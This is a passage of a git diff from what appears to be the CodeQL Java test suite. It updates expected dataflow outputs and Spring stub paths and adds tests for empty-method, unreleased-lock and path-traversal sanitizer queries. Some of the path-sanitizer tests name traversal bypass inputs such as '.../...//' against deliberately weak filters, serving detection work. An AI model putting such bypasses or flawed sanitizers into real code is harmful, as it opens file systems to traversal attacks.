A.java:30:14:30:16 | parameter this : new A(...) { ... } [String s] | @@ -60,20 +49,16 @@ | A.java:23:11:23:13 | "C" : String | A.java:39:12:39:12 | a : new A(...) { ... } [String s] | | A.java:25:22:25:24 | "D" : String | A.java:4:5:4:7 | parameter this [Return] : Box [elem] | | A.java:25:22:25:24 | "D" : String | A.java:4:9:4:16 | e : String | -| A.java:25:22:25:24 | "D" : String | A.java:4:19:4:31 | SSA def(e) : String | | A.java:25:22:25:24 | "D" : String | A.java:4:21:4:24 | this <.field> [post update] : Box [elem] | | A.java:25:22:25:24 | "D" : String | A.java:4:21:4:28 | ...=... : String | | A.java:25:22:25:24 | "D" : String | A.java:4:28:4:28 | e : String | | A.java:25:22:25:24 | "D" : String | A.java:6:12:6:18 | parameter this : Box [elem] | | A.java:25:22:25:24 | "D" : String | A.java:6:31:6:34 | elem : String | | A.java:25:22:25:24 | "D" : String | A.java:6:31:6:34 | this <.field> : Box [elem] | -| A.java:25:22:25:24 | "D" : String | A.java:14:7:14:20 | SSA def(a) : new A(...) { ... } [Box b1, ... (2)] | | A.java:25:22:25:24 | "D" : String | A.java:14:11:14:20 | f2(...) : new A(...) { ... } [Box b1, ... (2)] | | A.java:25:22:25:24 | "D" : String | A.java:15:16:15:16 | a : new A(...) { ... } [Box b1, ... (2)] | | A.java:25:22:25:24 | "D" : String | A.java:15:16:15:22 | get(...) : String | -| A.java:25:22:25:24 | "D" : String | A.java:25:9:25:25 | SSA def(b1) : Box [elem] | | A.java:25:22:25:24 | "D" : String | A.java:25:14:25:25 | new Box(...) : Box [elem] | -| A.java:25:22:25:24 | "D" : String | A.java:28:7:38:5 | SSA def(a) : new A(...) { ... } [Box b1, ... (2)] | | A.java:25:22:25:24 | "D" : String | A.java:28:11:38:5 | Box b1 : Box [elem] | | A.java:25:22:25:24 | "D" : String | A.java:28:11:38:5 | new (...) : new A(...) { ... } [Box b1, ... (2)] | | A.java:25:22:25:24 | "D" : String | A.java:30:14:30:16 | parameter this : new A(...) { ... } [Box b1, ... (2)] | @@ -88,19 +73,16 @@ | A.java:25:22:25:24 | "D" : String | A.java:39:12:39:12 | a : new A(...) { ... } [Box b1, ... (2)] | | A.java:27:16:27:18 | "E" : String | A.java:5:10:5:16 | parameter this [Return] : Box [elem] | | A.java:27:16:27:18 | "E" : String | A.java:5:18:5:25 | e : String | -| A.java:27:16:27:18 | "E" : String | A.java:5:28:5:40 | SSA def(e) : String | | A.java:27:16:27:18 | "E" : String | A.java:5:30:5:33 | this <.field> [post update] : Box [elem] | | A.java:27:16:27:18 | "E" : String | A.java:5:30:5:37 | ...=... : String | | A.java:27:16:27:18 | "E" : String | A.java:5:37:5:37 | e : String | | A.java:27:16:27:18 | "E" : String | A.java:6:12:6:18 | parameter this : Box [elem] | | A.java:27:16:27:18 | "E" : String | A.java:6:31:6:34 | elem : String | | A.java:27:16:27:18 | "E" : String | A.java:6:31:6:34 | this <.field> : Box [elem] | -| A.java:27:16:27:18 | "E" : String | A.java:14:7:14:20 | SSA def(a) : new A(...) { ... } [Box b2, ... (2)] | | A.java:27:16:27:18 | "E" : String | A.java:14:11:14:20 | f2(...) : new A(...) { ... } [Box b2, ... (2)] | | A.java:27:16:27:18 | "E" : String | A.java:15:16:15:16 | a : new A(...) { ... } [Box b2, ... (2)] | | A.java:27:16:27:18 | "E" : String | A.java:15:16:15:22 | get(...) : String | | A.java:27:16:27:18 | "E" : String | A.java:27:5:27:6 | b2 [post update] : Box [elem] | -| A.java:27:16:27:18 | "E" : String | A.java:28:7:38:5 | SSA def(a) : new A(...) { ... } [Box b2, ... (2)] | | A.java:27:16:27:18 | "E" : String | A.java:28:11:38:5 | Box b2 : Box [elem] | | A.java:27:16:27:18 | "E" : String | A.java:28:11:38:5 | new (...) : new A(...) { ... } [Box b2, ... (2)] | | A.java:27:16:27:18 | "E" : String | A.java:30:14:30:16 | parameter this : new A(...) { ... } [Box b2, ... (2)] | diff --git a/java/ql/test/library-tests/dataflow/null/testnullflow.expected b/java/ql/test/library-tests/dataflow/null/testnullflow.expected index d73b00f0fef1..532d64e81f8d 100644 --- a/java/ql/test/library-tests/dataflow/null/testnullflow.expected +++ b/java/ql/test/library-tests/dataflow/null/testnullflow.expected @@ -1,6 +1,4 @@ | A.java:5:18:5:21 | null | A.java:2:13:2:20 | o | -| A.java:5:18:5:21 | null | A.java:5:12:5:21 | SSA def(src) | | A.java:5:18:5:21 | null | A.java:5:18:5:21 | null | -| A.java:5:18:5:21 | null | A.java:6:12:6:18 | SSA def(x) | | A.java:5:18:5:21 | null | A.java:6:16:6:18 | src | | A.java:5:18:5:21 | null | A.java:7:10:7:10 | x | diff --git a/java/ql/test/library-tests/dataflow/partial/test.expected b/java/ql/test/library-tests/dataflow/partial/test.expected index 700c1b31dcfb..ea7da3a96902 100644 --- a/java/ql/test/library-tests/dataflow/partial/test.expected +++ b/java/ql/test/library-tests/dataflow/partial/test.expected @@ -3,14 +3,12 @@ edges | A.java:12:14:12:18 | src(...) : Object | A.java:12:5:12:5 | b [post update] : Box [elem] | | A.java:12:14:12:18 | src(...) : Object | A.java:12:5:12:18 | ...=... : Object | | A.java:13:12:13:12 | b : Box [elem] | A.java:17:13:17:16 | f1(...) : Box [elem] | -| A.java:17:9:17:16 | SSA def(b) : Box [elem] | A.java:18:8:18:8 | b : Box [elem] | -| A.java:17:13:17:16 | f1(...) : Box [elem] | A.java:17:9:17:16 | SSA def(b) : Box [elem] | +| A.java:17:13:17:16 | f1(...) : Box [elem] | A.java:18:8:18:8 | b : Box [elem] | | A.java:18:8:18:8 | b : Box [elem] | A.java:21:11:21:15 | b : Box [elem] | #select | 0 | A.java:12:5:12:5 | b [post update] : Box [elem] | | 0 | A.java:12:5:12:18 | ...=... : Object | | 0 | A.java:13:12:13:12 | b : Box [elem] | -| 1 | A.java:17:9:17:16 | SSA def(b) : Box [elem] | | 1 | A.java:17:13:17:16 | f1(...) : Box [elem] | | 1 | A.java:18:8:18:8 | b : Box [elem] | | 2 | A.java:21:11:21:15 | b : Box [elem] | diff --git a/java/ql/test/library-tests/dataflow/partial/testRev.expected b/java/ql/test/library-tests/dataflow/partial/testRev.expected index d798f4434805..15ce5d56acef 100644 --- a/java/ql/test/library-tests/dataflow/partial/testRev.expected +++ b/java/ql/test/library-tests/dataflow/partial/testRev.expected @@ -2,8 +2,7 @@ edges | A.java:4:16:4:18 | parameter this [Return] [elem] | A.java:22:17:22:25 | new Box(...) [elem] | | A.java:4:16:4:18 | this [post update] [elem] | A.java:4:16:4:18 | parameter this [Return] [elem] | | A.java:5:19:5:22 | elem | A.java:24:10:24:19 | other.elem | -| A.java:22:9:22:25 | SSA def(other) [elem] | A.java:23:13:23:17 | other [elem] | -| A.java:22:17:22:25 | new Box(...) [elem] | A.java:22:9:22:25 | SSA def(other) [elem] | +| A.java:22:17:22:25 | new Box(...) [elem] | A.java:23:13:23:17 | other [elem] | | A.java:23:13:23:17 | other [elem] | A.java:24:10:24:14 | other [elem] | | A.java:23:13:23:17 | other [post update] [elem] | A.java:24:10:24:14 | other [elem] | | A.java:24:10:24:14 | other [elem] | A.java:24:10:24:19 | other.elem | @@ -11,7 +10,6 @@ edges | A.java:28:5:28:5 | b [post update] [elem] | A.java:27:16:27:20 | b [Return] [elem] | | A.java:28:14:28:25 | new Object(...) | A.java:28:5:28:5 | b [post update] [elem] | #select -| 0 | A.java:22:9:22:25 | SSA def(other) [elem] | | 0 | A.java:22:17:22:25 | new Box(...) [elem] | | 0 | A.java:23:13:23:17 | other [elem] | | 0 | A.java:23:13:23:17 | other [post update] [elem] | diff --git a/java/ql/test/library-tests/dataflow/switchexpr/switchexprflow.expected b/java/ql/test/library-tests/dataflow/switchexpr/switchexprflow.expected index 551c836889da..d444bae3cc77 100644 --- a/java/ql/test/library-tests/dataflow/switchexpr/switchexprflow.expected +++ b/java/ql/test/library-tests/dataflow/switchexpr/switchexprflow.expected @@ -1,13 +1,9 @@ | TestSwitchExpr.java:4:15:4:22 | o | -| TestSwitchExpr.java:7:16:7:28 | SSA def(x1) | | TestSwitchExpr.java:7:21:7:28 | source(...) | -| TestSwitchExpr.java:8:16:8:30 | SSA def(x2) | | TestSwitchExpr.java:8:21:8:30 | switch (...) | | TestSwitchExpr.java:10:24:10:25 | x1 | -| TestSwitchExpr.java:12:16:12:30 | SSA def(x3) | | TestSwitchExpr.java:12:21:12:30 | switch (...) | | TestSwitchExpr.java:13:38:13:39 | x2 | -| TestSwitchExpr.java:16:16:16:30 | SSA def(x4) | | TestSwitchExpr.java:16:21:16:30 | switch (...) | | TestSwitchExpr.java:19:23:19:24 | x3 | | TestSwitchExpr.java:23:14:23:15 | x4 | diff --git a/java/ql/test/library-tests/dataflow/taint-ioutils/dataFlow.expected b/java/ql/test/library-tests/dataflow/taint-ioutils/dataFlow.expected index ffd641a45d70..1902605e618b 100644 --- a/java/ql/test/library-tests/dataflow/taint-ioutils/dataFlow.expected +++ b/java/ql/test/library-tests/dataflow/taint-ioutils/dataFlow.expected @@ -1,24 +1,19 @@ -| Test.java:12:15:12:47 | SSA def(inp) | | Test.java:12:21:12:47 | new FileInputStream(...) | | Test.java:14:21:14:39 | buffer(...) | | Test.java:14:36:14:38 | inp | -| Test.java:15:16:15:54 | SSA def(lines) | | Test.java:15:24:15:54 | readLines(...) | | Test.java:15:42:15:44 | inp | | Test.java:16:18:16:45 | readFully(...) | | Test.java:16:36:16:38 | inp | | Test.java:17:22:17:55 | toBufferedInputStream(...) | | Test.java:17:52:17:54 | inp | -| Test.java:18:10:18:71 | SSA def(bufread) | | Test.java:18:20:18:71 | toBufferedReader(...) | | Test.java:18:45:18:70 | new InputStreamReader(...) | | Test.java:18:67:18:69 | inp | | Test.java:19:19:19:48 | toByteArray(...) | | Test.java:19:39:19:41 | inp | -| Test.java:20:10:20:50 | SSA def(chars) | | Test.java:20:18:20:50 | toCharArray(...) | | Test.java:20:38:20:40 | inp | -| Test.java:21:10:21:43 | SSA def(s) | | Test.java:21:14:21:43 | toString(...) | | Test.java:21:31:21:33 | inp | | Test.java:22:20:22:52 | toInputStream(...) | diff --git a/java/ql/test/library-tests/dataflow/taintsources/options b/java/ql/test/library-tests/dataflow/taintsources/options index c8249b05e38e..ec6d96b41ac0 100644 --- a/java/ql/test/library-tests/dataflow/taintsources/options +++ b/java/ql/test/library-tests/dataflow/taintsources/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/servlet-api-2.4:${testdir}/../../../stubs/springframework-5.3.8:${testdir}/../../../stubs/google-android-9.0.0:${testdir}/../../../stubs/playframework-2.6.x:${testdir}/../../../stubs/jackson-databind-2.12:${testdir}/../../../stubs/jackson-core-2.12:${testdir}/../../../stubs/akka-2.6.x:${testdir}/../../../stubs/jwtk-jjwt-0.11.2:${testdir}/../../../stubs/jenkins:${testdir}/../../../stubs/stapler-1.263 \ No newline at end of file +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/servlet-api-2.4:${testdir}/../../../stubs/springframework-5.8.x:${testdir}/../../../stubs/google-android-9.0.0:${testdir}/../../../stubs/playframework-2.6.x:${testdir}/../../../stubs/jackson-databind-2.12:${testdir}/../../../stubs/jackson-core-2.12:${testdir}/../../../stubs/akka-2.6.x:${testdir}/../../../stubs/jwtk-jjwt-0.11.2:${testdir}/../../../stubs/jenkins:${testdir}/../../../stubs/stapler-1.263 diff --git a/java/ql/test/library-tests/dataflow/this-flow/this-flow.expected b/java/ql/test/library-tests/dataflow/this-flow/this-flow.expected index 5b59c2167074..1f28514b664d 100644 --- a/java/ql/test/library-tests/dataflow/this-flow/this-flow.expected +++ b/java/ql/test/library-tests/dataflow/this-flow/this-flow.expected @@ -10,13 +10,11 @@ | A.java:20:16:20:16 | this <.field> | | A.java:21:12:21:20 | getThis(...) | | A.java:21:12:21:20 | this <.method> | -| A.java:25:7:25:17 | SSA def(a) | | A.java:25:11:25:17 | new A(...) | | A.java:25:11:25:17 | new A(...) [pre constructor] | | A.java:26:12:26:12 | a | | A.java:26:12:26:22 | getThis(...) | | A.java:26:12:26:36 | getThisWrap(...) | -| A.java:27:7:27:17 | SSA def(c) | | A.java:27:11:27:17 | new C(...) | | A.java:27:11:27:17 | new C(...) [pre constructor] | | A.java:28:5:28:5 | c | diff --git a/java/ql/test/library-tests/frameworks/spring/beans/options b/java/ql/test/library-tests/frameworks/spring/beans/options index 0c6ef357b21a..2ce7a4743cd3 100644 --- a/java/ql/test/library-tests/frameworks/spring/beans/options +++ b/java/ql/test/library-tests/frameworks/spring/beans/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8 \ No newline at end of file +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.8.x diff --git a/java/ql/test/library-tests/frameworks/spring/cache/options b/java/ql/test/library-tests/frameworks/spring/cache/options index 06ec85dc706c..2ce7a4743cd3 100644 --- a/java/ql/test/library-tests/frameworks/spring/cache/options +++ b/java/ql/test/library-tests/frameworks/spring/cache/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.8.x diff --git a/java/ql/test/library-tests/frameworks/spring/componentscan/options b/java/ql/test/library-tests/frameworks/spring/componentscan/options index df84ab0bc1c5..bfb9659cc85f 100644 --- a/java/ql/test/library-tests/frameworks/spring/componentscan/options +++ b/java/ql/test/library-tests/frameworks/spring/componentscan/options @@ -1,2 +1,2 @@ //semmle-extractor-options: --javac-args -cp -//semmle-extractor-options: ${testdir}/../../../../stubs/springframework-5.3.8/ +//semmle-extractor-options: ${testdir}/../../../../stubs/springframework-5.8.x/ diff --git a/java/ql/test/library-tests/frameworks/spring/context/options b/java/ql/test/library-tests/frameworks/spring/context/options index be838ec7faba..7f08d0e67454 100644 --- a/java/ql/test/library-tests/frameworks/spring/context/options +++ b/java/ql/test/library-tests/frameworks/spring/context/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8:${testdir}/../../../../stubs/apache-commons-logging-1.2/ +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.8.x:${testdir}/../../../../stubs/apache-commons-logging-1.2/ diff --git a/java/ql/test/library-tests/frameworks/spring/controller/options b/java/ql/test/library-tests/frameworks/spring/controller/options index 9f114a23c96b..d981a45f408c 100644 --- a/java/ql/test/library-tests/frameworks/spring/controller/options +++ b/java/ql/test/library-tests/frameworks/spring/controller/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8:${testdir}/../../../../stubs/javax-servlet-2.5 \ No newline at end of file +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.8.x:${testdir}/../../../../stubs/javax-servlet-2.5 diff --git a/java/ql/test/library-tests/frameworks/spring/http/options b/java/ql/test/library-tests/frameworks/spring/http/options index 0c6ef357b21a..2ce7a4743cd3 100644 --- a/java/ql/test/library-tests/frameworks/spring/http/options +++ b/java/ql/test/library-tests/frameworks/spring/http/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8 \ No newline at end of file +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.8.x diff --git a/java/ql/test/library-tests/frameworks/spring/ui/options b/java/ql/test/library-tests/frameworks/spring/ui/options index 06ec85dc706c..2ce7a4743cd3 100644 --- a/java/ql/test/library-tests/frameworks/spring/ui/options +++ b/java/ql/test/library-tests/frameworks/spring/ui/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.8.x diff --git a/java/ql/test/library-tests/frameworks/spring/util/options b/java/ql/test/library-tests/frameworks/spring/util/options index 06ec85dc706c..2ce7a4743cd3 100644 --- a/java/ql/test/library-tests/frameworks/spring/util/options +++ b/java/ql/test/library-tests/frameworks/spring/util/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.8.x diff --git a/java/ql/test/library-tests/frameworks/spring/validation/options b/java/ql/test/library-tests/frameworks/spring/validation/options index 06ec85dc706c..2ce7a4743cd3 100644 --- a/java/ql/test/library-tests/frameworks/spring/validation/options +++ b/java/ql/test/library-tests/frameworks/spring/validation/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.8.x diff --git a/java/ql/test/library-tests/frameworks/spring/webmultipart/options b/java/ql/test/library-tests/frameworks/spring/webmultipart/options index ff7fd8624384..d981a45f408c 100644 --- a/java/ql/test/library-tests/frameworks/spring/webmultipart/options +++ b/java/ql/test/library-tests/frameworks/spring/webmultipart/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8:${testdir}/../../../../stubs/javax-servlet-2.5 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.8.x:${testdir}/../../../../stubs/javax-servlet-2.5 diff --git a/java/ql/test/library-tests/frameworks/spring/webutil/options b/java/ql/test/library-tests/frameworks/spring/webutil/options index 6dc26155d1d9..f62bc5777840 100644 --- a/java/ql/test/library-tests/frameworks/spring/webutil/options +++ b/java/ql/test/library-tests/frameworks/spring/webutil/options @@ -1 +1 @@ -//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.3.8:${testdir}/../../../../stubs/javax-servlet-2.5:${testdir}/../../../../stubs/apache-commons-logging-1.2 +//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../stubs/springframework-5.8.x:${testdir}/../../../../stubs/javax-servlet-2.5:${testdir}/../../../../stubs/apache-commons-logging-1.2 diff --git a/java/ql/test/library-tests/pathsanitizer/Test.java b/java/ql/test/library-tests/pathsanitizer/Test.java index d3285352fa38..5943d29c144b 100644 --- a/java/ql/test/library-tests/pathsanitizer/Test.java +++ b/java/ql/test/library-tests/pathsanitizer/Test.java @@ -604,4 +604,260 @@ public void fileConstructorSanitizer() throws Exception { sink(normalized); // $ hasTaintFlow } } + + private void directoryCharsValidation(String path) throws Exception { + if (!path.matches("[0-9a-fA-F]{20,}")) { + throw new Exception(); + } + } + + public void directoryCharsSanitizer() throws Exception { + // DirectoryCharactersGuard + // Ensures that directory characters (/, \ and ..) cannot possibly be in the payload + // branch = true + { + String source = (String) source(); + if (source.matches("[0-9a-fA-F]{20,}")) { + sink(source); // Safe + } else { + sink(source); // $ hasTaintFlow + } + } + { + String source = (String) source(); + if (source.matches("[0-9a-fA-F]*")) { + sink(source); // Safe + } else { + sink(source); // $ hasTaintFlow + } + } + { + String source = (String) source(); + if (source.matches("[0-9a-fA-F]+")) { + sink(source); // Safe + } else { + sink(source); // $ hasTaintFlow + } + } + { + String source = (String) source(); + if (source.matches("[0-9a-fA-F\\.]+")) { + sink(source); // $ hasTaintFlow + } else { + sink(source); // $ hasTaintFlow + } + } + { + String source = (String) source(); + if (source.matches("[0-9a-fA-F/]+")) { + sink(source); // $ hasTaintFlow + } else { + sink(source); // $ hasTaintFlow + } + } + { + String source = (String) source(); + if (source.matches("[0-9a-fA-F\\\\]+")) { + sink(source); // $ hasTaintFlow + } else { + sink(source); // $ hasTaintFlow + } + } + { + String source = (String) source(); + // exclude '.', '/', '\' + if (source.matches("[^0-9./\\\\a-f]+")) { + sink(source); // Safe + } else { + sink(source); // $ hasTaintFlow + } + } + { + String source = (String) source(); + // '/' is not excluded + if (source.matches("[^0-9.\\\\a-f]+")) { + sink(source); // $ hasTaintFlow + } else { + sink(source); // $ hasTaintFlow + } + } + // branch = false + { + String source = (String) source(); + if (source.matches(".*[\\./\\\\].*")) { + sink(source); // $ hasTaintFlow + } else { + sink(source); // Safe + } + } + { + String source = (String) source(); + if (source.matches(".+[\\./\\\\].+")) { + sink(source); // $ hasTaintFlow + } else { + sink(source); // Safe + } + } + { + String source = (String) source(); + // does not match whole string + if (source.matches("[\\./\\\\]+")) { + sink(source); // $ hasTaintFlow + } else { + sink(source); // $ hasTaintFlow + } + } + { + String source = (String) source(); + // not a complete sanitizer since it doesn't protect against absolute path injection + if (source.matches(".+[\\.].+")) { + sink(source); // $ hasTaintFlow + } else { + sink(source); // $ hasTaintFlow + } + } + // validation method + { + String source = (String) source(); + directoryCharsValidation(source); + sink(source); // Safe + } + + // ReplaceDirectoryCharactersSanitizer + // Removes ".." sequences and path separators from the payload + // single `replaceAll` call + { + String source = (String) source(); + source = source.replaceAll("\\.\\.|[/\\\\]", ""); + sink(source); // Safe + } + { + String source = (String) source(); + source = source.replaceAll("\\.|[/\\\\]", "-"); + sink(source); // Safe + } + { + String source = (String) source(); + source = source.replaceAll("[.][.]|[/\\\\]", "_"); + sink(source); // Safe + } + { + String source = (String) source(); + // test a not-accepted replacement character + source = source.replaceAll("[.][.]|[/\\\\]", "/"); + sink(source); // $ hasTaintFlow + } + { + String source = (String) source(); + source = source.replaceAll(".|[/\\\\]", ""); + sink(source); // $ hasTaintFlow + } + { + String source = (String) source(); + source = source.replaceAll("\\.|/|\\\\", ""); + sink(source); // Safe + } + { + String source = (String) source(); + source = source.replaceAll("[\\./\\\\]", ""); + sink(source); // Safe + } + { + String source = (String) source(); + source = source.replaceAll("[\\.\\\\]", ""); + sink(source); // $ hasTaintFlow + } + { + String source = (String) source(); + source = source.replaceAll("[^\\.\\\\/]", ""); + sink(source); // $ hasTaintFlow + } + { + String source = (String) source(); + // Bypassable with ".../...//" + source = source.replaceAll("\\.\\./", ""); + sink(source); // $ hasTaintFlow + } + // multiple `replaceAll` or `replace` calls + { + String source = (String) source(); + source = source.replaceAll("\\.", "").replaceAll("/", ""); + sink(source); // Safe + } + { + String source = (String) source(); + // test a not-accepted replacement character in each call + source = source.replaceAll("\\.", "/").replaceAll("/", "."); + sink(source); // $ hasTaintFlow + } + { + String source = (String) source(); + // test a not-accepted replacement character in first call + source = source.replaceAll("\\.", "/").replaceAll("/", "-"); + sink(source); // $ hasTaintFlow + } + { + String source = (String) source(); + // test a not-accepted replacement character in second call + source = source.replaceAll("\\.", "_").replaceAll("/", "."); + sink(source); // $ hasTaintFlow + } + { + String source = (String) source(); + source = source.replaceAll("\\.", "").replaceAll("/", "").replaceAll("\\\\", ""); + sink(source); // Safe + } + { + String source = (String) source(); + // '/' or '\' are not replaced + source = source.replaceAll("\\.", "").replaceAll("\\.", ""); + sink(source); // $ hasTaintFlow + } + { + String source = (String) source(); + // '.' is not replaced + source = source.replaceAll("/", "").replaceAll("\\\\", ""); + sink(source); // $ hasTaintFlow + } + { + String source = (String) source(); + // Bypassable with ".....///" + source = source.replaceAll("\\.\\./", "").replaceAll("\\./", ""); + sink(source); // $ hasTaintFlow + } + { + String source = (String) source(); + source = source.replace(".", "").replace("/", ""); + sink(source); // Safe + } + { + String source = (String) source(); + source = source.replace(".", "").replace("/", "").replace("\\", ""); + sink(source); // Safe + } + { + String source = (String) source(); + // '/' or '\' are not replaced + source = source.replace(".", "").replace(".", ""); + sink(source); // $ hasTaintFlow + } + { + String source = (String) source(); + // '.' is not replaced + source = source.replace("/", "").replace("\\", ""); + sink(source); // $ hasTaintFlow + } + { + String source = (String) source(); + // Bypassable with ".....///" + source = source.replace("../", "").replace("./", ""); + sink(source); // $ hasTaintFlow + } + { + String source = (String) source(); + // Bypassable with ".../...//" + source = source.replace("../", ""); + sink(source); // $ hasTaintFlow + } + } } diff --git a/java/ql/test/query-tests/EmptyMethod/Class1.java b/java/ql/test/query-tests/EmptyMethod/Class1.java new file mode 100644 index 000000000000..b1d5ac1fbf8b --- /dev/null +++ b/java/ql/test/query-tests/EmptyMethod/Class1.java @@ -0,0 +1,54 @@ +import org.aspectj.lang.annotation.Pointcut; + +public class Class1 { + + // COMPLIANT + public void f() { + int i = 0; + } + + // COMPLIANT + public void f1() { + // intentionally empty + } + + // NON_COMPLIANT + public void f2() { } // $ Alert + + // COMPLIANT - exception + @Pointcut() + public void f4() { + } + + /** + * COMPLIANT - empty method with javadoc + */ + public void f5() { + } + + public abstract class TestInner { + + public abstract void f(); // COMPLIANT - intentionally empty + + } + + public class Derived extends TestInner { + + // COMPLIANT: with annotation + @Override + public void f() { + } + + // COMPLIANT: native + public native int nativeMethod(); + } + + public interface TestInterface { + + // NON_COMPLIANT + default void method() { } // $ Alert + + void method2(); // COMPLIANT + } + +} diff --git a/java/ql/test/query-tests/EmptyMethod/EmptyMethod.expected b/java/ql/test/query-tests/EmptyMethod/EmptyMethod.expected new file mode 100644 index 000000000000..f8d854c84759 --- /dev/null +++ b/java/ql/test/query-tests/EmptyMethod/EmptyMethod.expected @@ -0,0 +1,2 @@ +| Class1.java:16:15:16:16 | f2 | Empty method found. | +| Class1.java:49:18:49:23 | method | Empty method found. | diff --git a/java/ql/test/query-tests/EmptyMethod/EmptyMethod.qlref b/java/ql/test/query-tests/EmptyMethod/EmptyMethod.qlref new file mode 100644 index 000000000000..f99a8f2e7550 --- /dev/null +++ b/java/ql/test/query-tests/EmptyMethod/EmptyMethod.qlref @@ -0,0 +1,2 @@ +query: Language Abuse/EmptyMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/java/ql/test/query-tests/EmptyMethod/Test.java b/java/ql/test/query-tests/EmptyMethod/Test.java new file mode 100644 index 000000000000..e3cb48f5abcc --- /dev/null +++ b/java/ql/test/query-tests/EmptyMethod/Test.java @@ -0,0 +1,5 @@ +public class Test { + // COMPLIANT: allow empty method in test class + public void f() { + } +} diff --git a/java/ql/test/query-tests/EmptyMethod/options b/java/ql/test/query-tests/EmptyMethod/options new file mode 100644 index 000000000000..2103c1f2f26e --- /dev/null +++ b/java/ql/test/query-tests/EmptyMethod/options @@ -0,0 +1 @@ +//semmle-extractor-options: --javac-args -cp ${testdir}/../../stubs/aspectj diff --git a/java/ql/test/query-tests/UnreleasedLock/UnreleasedLock.expected b/java/ql/test/query-tests/UnreleasedLock/UnreleasedLock.expected index 653314ad19d6..bb03c14f1b7a 100644 --- a/java/ql/test/query-tests/UnreleasedLock/UnreleasedLock.expected +++ b/java/ql/test/query-tests/UnreleasedLock/UnreleasedLock.expected @@ -3,3 +3,4 @@ | UnreleasedLock.java:40:3:40:15 | lock(...) | This lock might not be unlocked or might be locked more times than it is unlocked. | | UnreleasedLock.java:50:3:50:15 | lock(...) | This lock might not be unlocked or might be locked more times than it is unlocked. | | UnreleasedLock.java:72:8:72:23 | tryLock(...) | This lock might not be unlocked or might be locked more times than it is unlocked. | +| UnreleasedLock.java:114:13:114:28 | tryLock(...) | This lock might not be unlocked or might be locked more times than it is unlocked. | diff --git a/java/ql/test/query-tests/UnreleasedLock/UnreleasedLock.java b/java/ql/test/query-tests/UnreleasedLock/UnreleasedLock.java index 732ba7cd325d..eb8de3c496d6 100644 --- a/java/ql/test/query-tests/UnreleasedLock/UnreleasedLock.java +++ b/java/ql/test/query-tests/UnreleasedLock/UnreleasedLock.java @@ -5,18 +5,18 @@ void lock() throws RuntimeException { } void unlock() { } boolean isHeldByCurrentThread() { return true; } } - + void f() throws RuntimeException { } void g() throws RuntimeException { } - + MyLock mylock = new MyLock(); - + void bad1() { mylock.lock(); f(); mylock.unlock(); } - + void good2() { mylock.lock(); try { @@ -25,7 +25,7 @@ void good2() { mylock.unlock(); } } - + void bad3() { mylock.lock(); f(); @@ -35,7 +35,7 @@ void bad3() { mylock.unlock(); } } - + void bad4() { mylock.lock(); try { @@ -45,7 +45,7 @@ void bad4() { mylock.unlock(); } } - + void bad5(boolean lockmore) { mylock.lock(); try { @@ -58,7 +58,7 @@ void bad5(boolean lockmore) { mylock.unlock(); } } - + void good6() { if (!mylock.tryLock()) { return; } try { @@ -67,7 +67,7 @@ void good6() { mylock.unlock(); } } - + void bad7() { if (!mylock.tryLock()) { return; } f(); @@ -95,4 +95,29 @@ void good8() { mylock.unlock(); } } + + void good9() { + boolean locked = false; + try { + locked = mylock.tryLock(); + if (!locked) { return; } + } finally { + if (locked) { + mylock.unlock(); + } + } + } + + void bad10() { + boolean locked = false; + try { + locked = mylock.tryLock(); + if (!locked) { return; } + } finally { + if (locked) { + g(); + mylock.unlock(); + } + } + } } diff --git a/java/ql/test/query-tests/security/CWE-022/semmle/tests/options b/java/ql/test/query-tests/security/CWE-022/semmle/tests/options index 6f6c5a278883..547355c8e106 100644 --- a/java/ql/test/query-tests/security/CWE-022/semmle/tests/options +++ b/java/ql/test/query-tests/security/CWE-022/semmle/tests/options @@ -1 +1 @@ -// semmle-extractor-options: --javac-args -cp 